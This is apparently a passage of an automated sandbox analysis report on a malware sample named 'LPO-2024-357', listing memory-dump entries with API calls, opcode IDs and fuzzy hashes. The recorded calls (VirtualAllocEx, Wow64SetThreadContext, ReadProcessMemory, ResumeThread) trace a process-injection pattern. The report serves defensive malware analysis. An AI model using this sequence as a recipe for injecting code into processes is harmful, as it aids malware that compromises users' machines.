                                                                                                      • Instruction Fuzzy Hash: FF2105B2D0035A9FDB10CFA9C985ADEFBF5FF48310F10892AE518A7240C7789544DBA5
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B0C0FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 8f433a12627053efce780091139ac0b851ba6033f969c2f6a067b2d639c823f6
                                                                                                      • Instruction ID: e88bc927878fe3f139410f502ae75069da5d68127a5cfa872607fccdd95eb382
                                                                                                      • Opcode Fuzzy Hash: 8f433a12627053efce780091139ac0b851ba6033f969c2f6a067b2d639c823f6
                                                                                                      • Instruction Fuzzy Hash: 7A21F5B19002099FDB10CFAAC485BEEBFF5EF98324F14852AD459A7241CB789945CFA1
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B0C7C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: b8ae5937f5db2b028b46efa2f0cd6f0314c9da4eee1fc32765b7a84723dc2abf
                                                                                                      • Instruction ID: 806cfc529ed1b3f610b53f073bafb1f80181042226f9822b63ed2e07c54f0d6c
                                                                                                      • Opcode Fuzzy Hash: b8ae5937f5db2b028b46efa2f0cd6f0314c9da4eee1fc32765b7a84723dc2abf
                                                                                                      • Instruction Fuzzy Hash: 8E2128B1D003499FDB10CFAAC885ADEFBF5FF48320F10842AE518A7240C7789500DBA5
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B0C0FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 9190f24d8841b8ccf5febe74640d6db1c52cdd2a162869c11336f428b15973a1
                                                                                                      • Instruction ID: d8239bd3a831a3b1a76dd54499e13fac0dc4157327ae74b98e0dc5d1b58c3afe
                                                                                                      • Opcode Fuzzy Hash: 9190f24d8841b8ccf5febe74640d6db1c52cdd2a162869c11336f428b15973a1
                                                                                                      • Instruction Fuzzy Hash: 4D2107B19003099FDB10DFAAC4857EEBFF4EF48324F14842AD519A7240DB789945CBA5
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0103D6EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 94a91a01911dba1c1fc07c2e371454e9e3cb2e4f53f835abe7e52e0636ed85dc
                                                                                                      • Instruction ID: 408174b709fbbb8a6fb3a84c98d6db22402507ee121fd4c8f2cbe55d0edbcf13
                                                                                                      • Opcode Fuzzy Hash: 94a91a01911dba1c1fc07c2e371454e9e3cb2e4f53f835abe7e52e0636ed85dc
                                                                                                      • Instruction Fuzzy Hash: 9421F2B5D002489FDB10CF99D584ADEBBF8FF48320F14845AE918A7210D378A954DF60
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0103D6EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: efc185c0d8f80aec6d368bc4df413119f02a3b345a5eb88afdb55dc27fe0d9ec
                                                                                                      • Instruction ID: 4eebcff09840fb85214f76e59679ba7ee4a0830dbef8a4cf72cbe8f05e4d7572
                                                                                                      • Opcode Fuzzy Hash: efc185c0d8f80aec6d368bc4df413119f02a3b345a5eb88afdb55dc27fe0d9ec
                                                                                                      • Instruction Fuzzy Hash: AF21E4B5D002489FDB10CF9AD984ADEBFF8FB48320F14801AE918A7350D378A944DFA0
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B0C5FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 0cffed552f17888be81876d82f6b5b84e4ac20818821b4153fedbec48c7991e2
                                                                                                      • Instruction ID: 26d2ae76b516e81dabe57ba28ba181298751f24b5153baeb0f6027ad98d71736
                                                                                                      • Opcode Fuzzy Hash: 0cffed552f17888be81876d82f6b5b84e4ac20818821b4153fedbec48c7991e2
                                                                                                      • Instruction Fuzzy Hash: E01129B5900249DFDB20CFAAC885AEEFFF5EF98324F248419E519A7250C7759540DFA0
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B0C5FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 57611765b7e01da2e876034fe7d429d0997a50bb80f3534cf6357c1bdf59675b
                                                                                                      • Instruction ID: 9a1da91c3116aba763499e0059e15055f0f2bc4a01a4acda12fd93f59e7e5406
                                                                                                      • Opcode Fuzzy Hash: 57611765b7e01da2e876034fe7d429d0997a50bb80f3534cf6357c1bdf59675b
                                                                                                      • Instruction Fuzzy Hash: 561167B29002099FDB20CFAAC845BDFBFF5EF88324F248419E519A7250CB75A500DFA0
                                                                                                      APIs
                                                                                                      • ResumeThread.KERNELBASE(?), ref: 07B0C032
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: 043a02b8f278861aa051b27c7b09028259efd170c1365f926bce51564057038b
                                                                                                      • Instruction ID: a5ead9cb17d42e2e08ffcbeac2d98f37a31d83122bd2db56ee678cd69cdbf26b
                                                                                                      • Opcode Fuzzy Hash: 043a02b8f278861aa051b27c7b09028259efd170c1365f926bce51564057038b
                                                                                                      • Instruction Fuzzy Hash: F21146B1D002498EDB20CFAAC485BEEFFF5EF88324F24841AD519A7240CB796545CFA0
                                                                                                      APIs
                                                                                                      • ResumeThread.KERNELBASE(?), ref: 07B0C032
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: 26f375ad885edc5273d779653c490f138d4462c4052ba6775cf3884d30a6b405
                                                                                                      • Instruction ID: de5468a78fe6de31246a9f3069d3c26b57e9c8ad382d40571361ab047da41dba
                                                                                                      • Opcode Fuzzy Hash: 26f375ad885edc5273d779653c490f138d4462c4052ba6775cf3884d30a6b405
                                                                                                      • Instruction Fuzzy Hash: A51128B1D003498BDB20DFAAC4457DEFFF9EB88324F24845AD519A7240CB796544CBA5
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B0F69D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: dd3cd1c4b9951b51eb7457ea2896b18c9bce181a8c729e9057a16ad5d7f10179
                                                                                                      • Instruction ID: 53b8bfa973bab6ada1ad5f6dfe6f99b3147018e5abcdfa0afca44bf1b9cb7ddf
                                                                                                      • Opcode Fuzzy Hash: dd3cd1c4b9951b51eb7457ea2896b18c9bce181a8c729e9057a16ad5d7f10179
                                                                                                      • Instruction Fuzzy Hash: C31106B5900349DFDB20CF99D985BDEBFF4EB48314F208459D418A7250C375A544CFA1
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B0F69D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: fbccf4a88e01dcc36e70f8644542845bd78f421938bd857a79d9ee3a700e33d3
                                                                                                      • Instruction ID: cf2cf02a3203082cc15dd947c6a701924843de2beb3ea474c697e6c22a509f0c
                                                                                                      • Opcode Fuzzy Hash: fbccf4a88e01dcc36e70f8644542845bd78f421938bd857a79d9ee3a700e33d3
                                                                                                      • Instruction Fuzzy Hash: 3A1125B59003499FDB20DF8AC585BEEBFF8EB48320F10845AE518A7250C374A940CFA4
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0103B3FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: b71080a2c2c42566e6fa863a815dad56c52d8c2893852150d97c73b66d612ff6
                                                                                                      • Instruction ID: 0bb480dc97f0f8b37069a09985d9239e6ce52f8c7f0645eeda2b70360e0ce587
                                                                                                      • Opcode Fuzzy Hash: b71080a2c2c42566e6fa863a815dad56c52d8c2893852150d97c73b66d612ff6
                                                                                                      • Instruction Fuzzy Hash: A81110B6C003498FDB10CF9AC444ADEFBF8EF88328F10846AD959A7200C379A545CFA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1686840686.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fbd000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 61369cd816db6e2f9fbdc78c72dbc4ded343928763199d7cb33436e9fb3c98e8
                                                                                                      • Instruction ID: de745accdd7d1e23e87d83970dbdffbe9c28dc445439483abd27154559bdbc50
                                                                                                      • Opcode Fuzzy Hash: 61369cd816db6e2f9fbdc78c72dbc4ded343928763199d7cb33436e9fb3c98e8
                                                                                                      • Instruction Fuzzy Hash: 1E2142B2904200DFCB04DF15D9C0BA6BF66FB98324F30856DE9090B256D336D806EFA2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1687127903.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fcd000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0866d5a08274dba4f9b20bdab2e860127ebd9e5d9f7310ac07ed132a15794f6f
                                                                                                      • Instruction ID: 2834410f97a5bd8320a7fd21e1c1d338e57e57d93f729206cacb4906622d3a7f
                                                                                                      • Opcode Fuzzy Hash: 0866d5a08274dba4f9b20bdab2e860127ebd9e5d9f7310ac07ed132a15794f6f
                                                                                                      • Instruction Fuzzy Hash: 4A212975504245DFCB08DF14DAC1F2ABB65FB84324F24C57DE9094B296C336D846EB62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1687127903.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fcd000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0ce6466862e7e41e4f552b9f3f5a8e6fcbc92277ea551c4ca40a9e687e5f0ab8
                                                                                                      • Instruction ID: 3525311b45152c7bd416d4521e1761bb393a2134c01a86d1687ef2443db06218
                                                                                                      • Opcode Fuzzy Hash: 0ce6466862e7e41e4f552b9f3f5a8e6fcbc92277ea551c4ca40a9e687e5f0ab8
                                                                                                      • Instruction Fuzzy Hash: A62104B2904305EFDB05DF14CAC1F2ABB65FB84324F24C9BDE8494B252C336D846EA61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1686840686.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fbd000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                      • Instruction ID: 6dd2ec17fe291d83feab5be475e4cc5a7528b009b750ca60735b61530e76fd16
                                                                                                      • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                      • Instruction Fuzzy Hash: 9B11E176804280CFCB12CF10D5C0B56BF72FB94324F2482A9D8094B256C33AD85ADFA2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1687127903.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fcd000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                      • Instruction ID: a14e9d5d1c164a99dc057c74d6dc554bc9a502a63b68b846869de1e275e99a21
                                                                                                      • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                      • Instruction Fuzzy Hash: A911D075904240CFCB01CF10CAC0B19BB61FB84324F24C6AED8494B656C33AD84ACB51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1687127903.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fcd000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                      • Instruction ID: ae773c49000095124ab879f3c86281bea35e81d8bd0c21d9e2e61b1ca62a0f46
                                                                                                      • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                      • Instruction Fuzzy Hash: 2411D075904240CFCB05CF14D6C4B19BB72FB84328F24C6ADD9094B656C33AE84ACB51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'dq$TJiq$Tedq$phq$xbgq
                                                                                                      • API String ID: 0-3854726174
                                                                                                      • Opcode ID: ba7b130a5ca98ca6a5ff88b7b915ceaa3b441ddc98edda9baf3e20b2145d2b90
                                                                                                      • Instruction ID: af1ed7e92ae01a8e00b7f0710892a1825f0ce8ef61c292cb67ad3d25e474a719
                                                                                                      • Opcode Fuzzy Hash: ba7b130a5ca98ca6a5ff88b7b915ceaa3b441ddc98edda9baf3e20b2145d2b90
                                                                                                      • Instruction Fuzzy Hash: 22B2C374A00228CFDB64DF69C984BD9BBB2FF89304F1581E9D509AB265DB319E81CF40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: TJiq$Tedq$xbgq
                                                                                                      • API String ID: 0-1882855624
                                                                                                      • Opcode ID: 675d37a49dfc21c9f6a4b60934ba8e521e9cd1488502f07ede14e82d27b88af4
                                                                                                      • Instruction ID: d9a0a334a997356f61e2615661f8bc56910e4f79b26039b46e89d4a719573074
                                                                                                      • Opcode Fuzzy Hash: 675d37a49dfc21c9f6a4b60934ba8e521e9cd1488502f07ede14e82d27b88af4
                                                                                                      • Instruction Fuzzy Hash: 26C190B5E006588FDB59DF6AC9446D9BBF2BF89300F14C0EAD809AB365DB305A85CF50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701631240.0000000009110000.00000040.00000800.00020000.00000000.sdmp, Offset: 09110000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9110000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'dq
                                                                                                      • API String ID: 0-1167855494
                                                                                                      • Opcode ID: c32701918dca192f05c5b139898ce9d3951fff1064c673a50b73cdf6105587a0
                                                                                                      • Instruction ID: 57eb36b22367c1313f38dec00a6e8d4b458816a3349828c0bf8512239e4b8a40
                                                                                                      • Opcode Fuzzy Hash: c32701918dca192f05c5b139898ce9d3951fff1064c673a50b73cdf6105587a0
                                                                                                      • Instruction Fuzzy Hash: 8C613EB0E10244CFD758EF7AE95169E7FF2BBC9308F14D429E008A7268DF7066469B41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701631240.0000000009110000.00000040.00000800.00020000.00000000.sdmp, Offset: 09110000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9110000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'dq
                                                                                                      • API String ID: 0-1167855494
                                                                                                      • Opcode ID: 200bdf535459424c90a52c9d900976be2e3fd16a336464637a282fa999134e64
                                                                                                      • Instruction ID: 8f197c9e73c17118156f094a6d65f46a8ee247bbc212dc7de04154d9018a3b14
                                                                                                      • Opcode Fuzzy Hash: 200bdf535459424c90a52c9d900976be2e3fd16a336464637a282fa999134e64
                                                                                                      • Instruction Fuzzy Hash: 40612EB0E10244CFD758EF7AE95169E7FF2BBC9308F14D429E008A7268DF746A459B40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701631240.0000000009110000.00000040.00000800.00020000.00000000.sdmp, Offset: 09110000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9110000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b6a7128eb4eabe4dda0ce14faee3f3c3d56c872a1968e325e0d496f2a122e0a8
                                                                                                      • Instruction ID: 68f1cfc26ab8b5849367f87f37d913e89c6f69dd1308312ae6f8f4231df2a9ac
                                                                                                      • Opcode Fuzzy Hash: b6a7128eb4eabe4dda0ce14faee3f3c3d56c872a1968e325e0d496f2a122e0a8
                                                                                                      • Instruction Fuzzy Hash: AE327A71B01205AFDB19DF69C590BAEBBF6EF89304F1444A9E146DB3A1CB34E902CB51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f809e87672385f562c0c4ecbda87a209fcfbf39579fd24521104ea8d7db7659c
                                                                                                      • Instruction ID: b0f543d1fc18e8f3dca67112e81a2adc581f8f122ae4e20216b9de3d19a0eef7
                                                                                                      • Opcode Fuzzy Hash: f809e87672385f562c0c4ecbda87a209fcfbf39579fd24521104ea8d7db7659c
                                                                                                      • Instruction Fuzzy Hash: 19E1DCB4E04119CFDB14DFA9C9909AEFBB2FF89314F248199D815AB355D730A941CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8fd64294ac54710943cda99318e5cfeaa251f50cb3271ba8b02666dfcf65c2e0
                                                                                                      • Instruction ID: c2e2a4214af4a75b4ccf16422df0ed0547013059f97d430fd39bb6b10a31e54f
                                                                                                      • Opcode Fuzzy Hash: 8fd64294ac54710943cda99318e5cfeaa251f50cb3271ba8b02666dfcf65c2e0
                                                                                                      • Instruction Fuzzy Hash: 1EE1EDB4E04119CFDB14DFA9C5909AEFBB2FF89314F2481A9D815AB356D730A941CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0b138f5ed0409cea9feb709c2ea20d9ea1b521a4b32f113dd8468cad70b03ec8
                                                                                                      • Instruction ID: 3a84f5e60e232d9344c6ce88c57618376fc4b2abacf2aa8e90fafbd4e3d37393
                                                                                                      • Opcode Fuzzy Hash: 0b138f5ed0409cea9feb709c2ea20d9ea1b521a4b32f113dd8468cad70b03ec8
                                                                                                      • Instruction Fuzzy Hash: 46E1DAB4E04119CFDB14DFA9C5909AEBFB2FF89314F2482A9D815AB355D730A941CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 38a9be9ec3a4fc52eb8339d70d4f799267aa721b851b0d27e99053111920ef98
                                                                                                      • Instruction ID: ce7819df236c0f2ddb1a339c4d81d6beff9469ef50b8430b5036ae50e5db7a46
                                                                                                      • Opcode Fuzzy Hash: 38a9be9ec3a4fc52eb8339d70d4f799267aa721b851b0d27e99053111920ef98
                                                                                                      • Instruction Fuzzy Hash: CEE1E9B4E042198FDB14DFA9C5809AEFBB2FF89304F24C5A9D815AB355D731A941CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1701120725.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7b00000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 89bdcc3615319ab3ce646cf71b8ba83a90f2b92eb349c1f09ef30c20603ebc10
                                                                                                      • Instruction ID: 98ec5c69aee48ceefdf445c0a3516a153d4301ef99328551024cc1447d473e24
                                                                                                      • Opcode Fuzzy Hash: 89bdcc3615319ab3ce646cf71b8ba83a90f2b92eb349c1f09ef30c20603ebc10
                                                                                                      • Instruction Fuzzy Hash: 82E1EBB4E04119CFDB14DF99C5909AEFBB2FF89314F248199E815AB356D730A941CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1700837785.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7640000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 97a643e857014f52e1e482c52fd19893a7a2cde9028c6f15dd490a59704c1eb0
                                                                                                      • Instruction ID: 80217d492f4d6ad2d006444b1a7f5e053d59d5a13e3c8e89cb8dc65c94f4522f
                                                                                                      • Opcode Fuzzy Hash: 97a643e857014f52e1e482c52fd19893a7a2cde9028c6f15dd490a59704c1eb0
                                                                                                      • Instruction Fuzzy Hash: 0DD1E63192075ACACB10EFA4D9906D9B7B1FFA5304F60D79AE00937625EF706AC4DB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1689196852.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1030000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c5de2ad9fad92e145ec722fcbddf5a94432d697c9967dfd8b96763cddaf75b23
                                                                                                      • Instruction ID: fe49851c67a92c9ce61eefb64c5dff7f279b6be250247788d065f851678fb4b5
                                                                                                      • Opcode Fuzzy Hash: c5de2ad9fad92e145ec722fcbddf5a94432d697c9967dfd8b96763cddaf75b23
                                                                                                      • Instruction Fuzzy Hash: 5BA14C32E002168FCF19DFB5C9845DEBBB6FFC4300B1585AAE906AB265DB31E955CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1700837785.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7640000_LPO-2024-357.jbxd
                                                                                                      Similarity
